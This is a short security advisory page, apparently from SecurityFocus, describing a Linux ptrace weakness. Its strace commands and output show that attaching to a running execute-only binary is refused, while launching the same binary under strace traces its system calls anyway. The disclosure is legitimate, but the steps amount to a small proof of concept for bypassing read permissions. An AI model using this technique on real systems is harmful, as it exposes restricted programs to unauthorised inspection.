Linux Non-Readable File Ptrace Vulnerability

Trace on non-readable file using PT_ATTACH:

$ ls -l testfile
-rwx--x--x 1 root root 216916 Dec 4 11:59 testfile

$ ./testfile
waiting..

From another shell:

$ strace -p 11535 <---process ID of "testfile" process
attach: ptrace(PTRACE_ATTACH, ...): Operation not permitted <---Because testfile isn't readable. Good, secure behaviour

---------------

Trace on non-readable file as child process:

$ strace testfile

SYS_197(0x3, 0xbffff650, 0x40197d40, 0x80cca38, 0x3) = -1 ENOSYS (Function not implemented)
fstat(3, {st_mode=S_IFREG|0644, st_size=1744, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000
..


 

Privacy Statement
Copyright 2010, SecurityFocus